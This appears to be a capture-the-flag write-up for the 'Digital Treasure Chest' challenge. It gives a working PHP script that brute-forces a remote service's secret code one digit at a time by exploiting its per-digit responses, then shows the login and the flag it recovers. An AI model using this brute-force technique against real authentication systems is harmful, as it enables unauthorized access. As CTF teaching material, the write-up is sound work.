Digital Treasure Chest (300)
You were asked to pentest the 1.1 beta-version of the digital treasure chest.
Finding an authentication bypass appears to be trivial to you.
pirates.fluxfingers.net 6969/tcp
$ nc pirates.fluxfingers.net 6969 010 WELCOME. Please Enter your secret digits 0 555 Wrong credentials
If we try some more numbers, we will get:
$ nc pirates.fluxfingers.net 6969 010 WELCOME. Please Enter your secret digits 9 011 Continue 5 555 Wrong credentials
Easy to guess, we are wanted to bruteforce secret digits, one by one (not the whole number). Here is a simple php script for that:
<?php $key = ""; while (1) { for ($i = 0; $i < 10; $i++) { $f = fsockopen("pirates.fluxfingers.net", "6969"); fgets($f); fwrite($f, "$key$i\n"); $s = fgets($f); if (strpos($s, "011") !== false) { $key .= $i; echo $i; break; } if (strpos($s, "555") === false) { echo "\nSTRANGE ANSWER (key={$key}{$i}): $s\n"; die(); } } } ?>
Running it:
$ php pwn.php 9200372140803765602 STRANGE ANSWER (key=92003721408037656022): 100 Login successful $ nc pirates.fluxfingers.net 6969 010 WELCOME. Please Enter your secret digits 92003721408037656022 100 Login successful help 310 Command listing version (show version number) list (list treasure chests) show N (show content Nth chest) empty (empty the Nth chest - not available yet) fill N M (fill Nth chest with M gold - not available yet) quit (quit) list 310 Listing chests: 1) DTCE Monthly Newsletter 2) damn secret 3) Welcome to our Digital Treasure Chest Enterprise show 2 310 --------------- damn yer those bloody royal guards. I just want my rrrrum! also, the Key is 'f00k1namaZ!ng' Funny: A pirate does not "go shopping". Unless by "shopping", you mean "killing". ---------------
The flag: f00k1namaZ!ng
1 comment
Thanks for the writeup!